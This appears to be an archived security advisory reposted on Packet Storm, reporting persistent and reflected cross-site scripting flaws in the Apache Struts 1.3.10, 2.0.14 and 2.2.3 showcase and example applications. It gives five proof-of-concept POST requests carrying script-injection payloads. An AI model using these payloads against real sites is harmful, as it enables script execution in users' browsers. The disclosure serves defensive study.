exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Apache Struts 1.3.10 / 2.0.14 / 2.2.3 Cross Site Scripting

Apache Struts 1.3.10 / 2.0.14 / 2.2.3 Cross Site Scripting
Posted Feb 3, 2012
Authored by Antu Sanadi | Site secpod.com

Apache Struts versions 1.3.10, 2.0.14 and 2.2.3 suffer from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | d9fa78ab565ffc78f9b758171aa45c73f075a712e2b675fb27d4d85d6afd0004

Apache Struts 1.3.10 / 2.0.14 / 2.2.3 Cross Site Scripting

Change Mirror Download
##############################################################################
#
# Title : Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
# Author : Antu Sanadi SecPod Technologies (www.secpod.com)
# Vendor : http://struts.apache.org/
# Advisory : http://secpod.org/blog/?p=450
# http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt
# Software : Apache struts 1.3.10, 2.0.14 and 2.2.3
# Date : 01/02/2012
#
##############################################################################

SecPod ID: 1021 21/07/2011 Issue Discovered
03/08/2011 Vendor Notified
No Response
01/02/2012 Advisory Released

Class: Cross-Site Scripting (Persistence) Severity: High


Overview:
---------
Apache Struts Multiple Persistence Cross-Site Scripting Vulnerabilities.


Technical Description:
----------------------
Multiple persistence Cross-Site Scripting vulnerabilities are present in
Apache Struts, as it fails to sanitise user-supplied input.

i) Input passed via the 'name' and 'lastName' parameter in
'/struts2-showcase/person/editPerson.action' is not properly verified
before it is returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site.

ii) Input passed via the 'clientName' parameter in
'/struts2-rest-showcase/orders' action is not properly verified before
it is returned to the user. This can be exploited to execute arbitrary
HTML and script code in a user's browser session in the context of a
vulnerable site.

iii) Input passed via the 'name' parameter in
'/struts-examples/upload/upload-submit.do?queryParam=Successful' action
is not properly verified before it is returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user's browser
session in the context of a vulnerable site.

iV) Input passed via the 'message' parameter in
'/struts-cookbook/processSimple.do' action is not properly verified
before it is returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site.

V) Input passed via the 'message' parameter in
'/struts-cookbook/processSimple.do' action is not properly verified
before it is returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site.

These vulnerabilities have been tested on Apache Struts2 v2.2.3,
Apache Struts2 v2.0.14 and Apache Struts v1.3.10.
Other versions may also be affected.


Impact:
--------
Successful exploitation could allow an attacker to execute arbitrary HTML
code in a user's browser session in the context of a vulnerable application.


Affected Software:
------------------
Apache struts 2.2.3 and prior.

Tested on,
i) Apache struts 2.2.3 - Stored XSS
- struts2-showcase-2.2.3
- struts2-rest-showcase-2.2.3

ii) Apache struts 2.0.14 - Stored XSS
- struts2-showcase-2.0.14

iii) Apache struts 1.3.10 - Reflected XSS
- struts-cookbook-1.3.10
- struts-examples-1.3.10


References:
-----------
http://struts.apache.org
http://secpod.org/blog/?p=450


Proof of Concept:
-----------------

POC 1:
-----
Stored XSS

POST struts2-showcase/person/editPerson.action HTTP/1.1

Host: SERVER_IP:8080
User-Agent: struts2-showcase XSS-TEST
Content-Type: application/x-www-form-urlencoded
Content-Length: 192

Post Data:
----------
persons%281%29.name=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript
%3E&persons%281%29.lastName=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2
Fscript%3E&method%3Asave=Save+all+persons


POC 2:
-----
Stored XSS

POST /struts2-rest-showcase/orders HTTP/1.1

Host: SERVER_IP:8080
User-Agent: struts2-rest-showcase XSS-TEST
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

Post Data:
----------
clientName=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript%3E&amount=


POC 3:
-----
Reflected XSS

POST /struts-examples/upload/upload-submit.do?queryParam=Successful HTTP/1.1

Host: SERVER_IP:8080
User-Agent: Struts-examples XSS-TEST
Content-Type: multipart/form-data; boundary=---------------------------41701
161044225432961947041
Content-Length: 481

Post Data:
----------
-----------------------------41701161044225432961947041\r\n
Content-Disposition: form-data; name="theText"\r\n
\r\n
<script>alert("SecPod-XSS-TEST")</script>\r\n
-----------------------------41701161044225432961947041\r\n
Content-Disposition: form-data; name="theFile"; filename=""\r\n
Content-Type: application/octet-stream\r\n
\r\n
\r\n
-----------------------------41701161044225432961947041\r\n
Content-Disposition: form-data; name="filePath"\r\n
\r\n
\r\n
-----------------------------41701161044225432961947041--\r\n


POC 4:
-----
Reflected XSS

POST /struts-cookbook/processSimple.do HTTP/1.1

Host: SERVER_IP:8080
User-Agent:Struts-cookbook XSS-TEST
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

Post Data:
----------
name=XYZ&secret=XYZ&color=red&confirm=on&rating=1&message=%3Cscript%3Ealert
%28%22SecPod-XSS-TEST%22%29%3C%2Fscript%3E&


POC 5:
-----
Reflected XSS

POST /struts-cookbook/processDyna.do HTTP/1.1

Host: SERVER_IP:8080
User-Agent:Struts-cookbook XSS-TEST
Content-Type: application/x-www-form-urlencoded
Content-Length: 95

Post Data:
----------
name=ZYZ&secret=&color=red&message=%3Cscript%3Ealert%28%22SecPod-XSS-TEST
%22%29%3C%2Fscript%3E&


Solution:
---------
Fix not available


Risk Factor:
-------------
CVSS Score Report:
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = LOW
AUTHENTICATION = NONE
CONFIDENTIALITY_IMPACT = PARTIAL
INTEGRITY_IMPACT = PARTIAL
AVAILABILITY_IMPACT = NONE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 6.4 (High) (AV:N/AC:L/Au:N/C:N/I:P/A:N)

Credits:
--------
Antu Sanadi of SecPod Technologies has been credited with the discovery of this
vulnerability.

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close